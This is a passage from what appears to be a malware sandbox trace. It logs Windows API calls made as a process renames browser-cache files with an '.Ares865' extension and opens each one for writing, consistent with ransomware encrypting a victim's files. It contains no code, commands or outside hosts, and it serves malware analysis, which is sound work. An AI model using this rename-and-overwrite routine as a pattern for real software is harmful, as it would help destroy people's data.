(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js.ares865"), dwFlags=0x1) returned 1 [0095.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1969) returned 1 [0095.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini.Ares865") returned 114 [0095.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0095.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0095.700] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg.Ares865") returned 118 [0095.700] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\eula-mac[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.702] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18618) returned 1 [0095.706] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js.Ares865") returned 111 [0095.706] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js.ares865"), dwFlags=0x1) returned 1 [0095.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ga[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\ga[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.708] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43082) returned 1 [0095.713] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].Ares865") returned 249 [0095.713] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].ares865"), dwFlags=0x1) returned 1 [0095.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1d;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=5;target=_blank;aduho=600;grp=852361999[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.715] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4869) returned 1 [0095.718] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY" [0095.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif.Ares865") returned 122 [0095.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif.ares865"), dwFlags=0x1) returned 1 [0095.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.721] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58453) returned 1 [0095.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js.Ares865") returned 136 [0095.727] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js.ares865"), dwFlags=0x1) returned 1 [0095.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\1223855322-postmessagerelay[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\1223855322-postmessagerelay[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.729] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10537) returned 1 [0095.732] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png.Ares865") returned 117 [0095.732] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png.ares865"), dwFlags=0x1) returned 1 [0095.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA3e1oO[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa3e1oo[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.734] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=667) returned 1 [0095.736] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png.Ares865") returned 117 [0095.736] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png.ares865"), dwFlags=0x1) returned 1 [0095.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=613) returned 1 [0095.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png.Ares865") returned 117 [0095.741] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png.ares865"), dwFlags=0x1) returned 1 [0095.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA42pjY[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa42pjy[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=594) returned 1 [0095.749] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png.Ares865") returned 117 [0095.749] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png.ares865"), dwFlags=0x1) returned 1 [0095.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=584) returned 1 [0095.753] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png.Ares865") returned 117 [0095.753] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png.ares865"), dwFlags=0x1) returned 1 [0095.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA6KizP[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa6kizp[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=539) returned 1 [0095.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png.Ares865") returned 117 [0095.760] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png.ares865"), dwFlags=0x1) returned 1 [0095.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA7XCQ3[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa7xcq3[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=635) returned 1 [0095.766] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png.Ares865") returned 117 [0095.766] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png.ares865"), dwFlags=0x1) returned 1 [0095.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA8Tave[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa8tave[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=616) returned 1 [0095.775] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png.Ares865") returned 117 [0095.775] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png.ares865"), dwFlags=0x1) returned 1 [0095.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAfOIDq[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aafoidq[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=542) returned 1 [0095.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png.Ares865") returned 117 [0095.780] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png.ares865"), dwFlags=0x1) returned 1 [0095.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=739) returned 1 [0095.786] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png.Ares865") returned 117 [0095.786] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png.ares865"), dwFlags=0x1) returned 1 [0095.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAmRY2Q[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\aamry2q[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300) returned 1 [0095.791] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 